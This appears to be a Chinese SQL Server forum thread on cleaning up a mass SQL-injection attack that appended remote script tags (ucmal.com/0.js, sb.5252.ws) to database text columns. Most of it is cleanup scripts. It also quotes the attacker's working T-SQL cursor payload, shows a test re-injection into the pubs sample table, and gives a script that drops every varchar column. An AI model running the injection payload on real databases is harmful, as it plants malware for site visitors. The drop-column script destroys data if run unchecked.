update tb set col = replace(col,'<script_src=http://ucmal.com/0.js> </script>','')
--如果是所有的,参考下例: --删除指定类型的所有字段--要删除的列的数据类型 DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'ALTER TABLE '+QUOTENAME(o.name) +N' DROP COLUMN '+QUOTENAME(c.name) FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'
--如果是所有的,参考下例(未测试):--要更改的列的数据类型(应该是char,varchar等) DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ' , ''<script_src=http://ucmal.com/0.js> </script>'' , ''''' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'
update tablename set col = replace(col,'<script_src=http://ucmal.com/0.js> </script>','')
--上面漏写了个),测试成功. DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'
像是SQL Injection的東西,他run了這個 DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id = b.id and a.xtype = 'u' and ( b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167 ) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE( @@FETCH_STATUS = 0 ) BEGIN exec ( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,[' + @C + ']))+''<script src=http://ucmal.com/0.js></script>''' ) FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
--修改sql server 2000自带库pubs的auhtors表的字段address,city的长度为200 update authors set address = address + '<script_src=http://ucmal.com/0.js> </script>' update authors set city = city + '<script_src=http://ucmal.com/0.js> </script>' select address , city from authors /* address city -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 10932 Bigge Rd.<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Menlo Park<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> 309 63rd St. #411<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Oakland<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> 589 Darwin Ln.<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Berkeley<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> ......(省略20行)(所影响的行数为 23 行) */--使用我的方法替换'<script_src=http://ucmal.com/0.js> </script>' DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'select address , city from authors/* address city ------------------------ ------------------- 10932 Bigge Rd. Menlo Park 309 63rd St. #411 Oakland 589 Darwin Ln. Berkeley 22 Cleveland Av. #14 San Jose 5420 College Av. Oakland 10 Mississippi Dr. Lawrence 6223 Bateman St. Berkeley 3410 Blonde St. Palo Alto PO Box 792 Covelo 18 Broadway Av. San Francisco 22 Graybar House Rd. Nashville 55 Hillsdale Bl. Corvallis 3 Silver Ct. Walnut Creek 2286 Cram Pl. #86 Ann Arbor 3 Balding Pl. Gary 5420 Telegraph Av. Oakland 44 Upland Hts. Oakland 5720 McAuley St. Oakland 1956 Arlington Pl. Rockville 3410 Blonde St. Palo Alto 301 Putnam Vacaville 67 Seventh Av. Salt Lake City 67 Seventh Av. Salt Lake City(所影响的行数为 23 行) */--可以看到,修改成功。
我要替换这个垃圾代码:</title></pre>><sc</title></pre>><scriptsrc=http://sb.5252.ws:88/107/1.js></script>< 你这个程序只要放到查询分析器中执行就可以了吗,但是光说执行完成,但是没替换掉 DECLARE @fieldtype sysname SET @fieldtype='varchar'--删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''</title></pre>><sc</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name=@fieldtype EXEC sp_MSforeach_Worker @command1=N'?'
set col = replace(col,'<script_src=http://ucmal.com/0.js> </script>','')
--删除指定类型的所有字段--要删除的列的数据类型
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'ALTER TABLE '+QUOTENAME(o.name)
+N' DROP COLUMN '+QUOTENAME(c.name)
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ' , ''<script_src=http://ucmal.com/0.js> </script>'' , '''''
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
set col = replace(col,'<script_src=http://ucmal.com/0.js> </script>','')
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://ucmal.com/0.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
update authors set address = address + '<script_src=http://ucmal.com/0.js> </script>'
update authors set city = city + '<script_src=http://ucmal.com/0.js> </script>'
select address , city from authors
/*
address city
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
10932 Bigge Rd.<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Menlo Park<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script>
309 63rd St. #411<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Oakland<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script>
589 Darwin Ln.<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script> Berkeley<script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script><script_src=http://ucmal.com/0.js> </script>
......(省略20行)(所影响的行数为 23 行)
*/--使用我的方法替换'<script_src=http://ucmal.com/0.js> </script>'
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'select address , city from authors/*
address city
------------------------ -------------------
10932 Bigge Rd. Menlo Park
309 63rd St. #411 Oakland
589 Darwin Ln. Berkeley
22 Cleveland Av. #14 San Jose
5420 College Av. Oakland
10 Mississippi Dr. Lawrence
6223 Bateman St. Berkeley
3410 Blonde St. Palo Alto
PO Box 792 Covelo
18 Broadway Av. San Francisco
22 Graybar House Rd. Nashville
55 Hillsdale Bl. Corvallis
3 Silver Ct. Walnut Creek
2286 Cram Pl. #86 Ann Arbor
3 Balding Pl. Gary
5420 Telegraph Av. Oakland
44 Upland Hts. Oakland
5720 McAuley St. Oakland
1956 Arlington Pl. Rockville
3410 Blonde St. Palo Alto
301 Putnam Vacaville
67 Seventh Av. Salt Lake City
67 Seventh Av. Salt Lake City(所影响的行数为 23 行)
*/--可以看到,修改成功。
你这个程序只要放到查询分析器中执行就可以了吗,但是光说执行完成,但是没替换掉
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''</title></pre>><sc</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
在网上搜索iis安全设置,数据库安全设置也不起作用还有就是用盗版sql2000,即使打上sp4也存在问题这个只能换成正版的了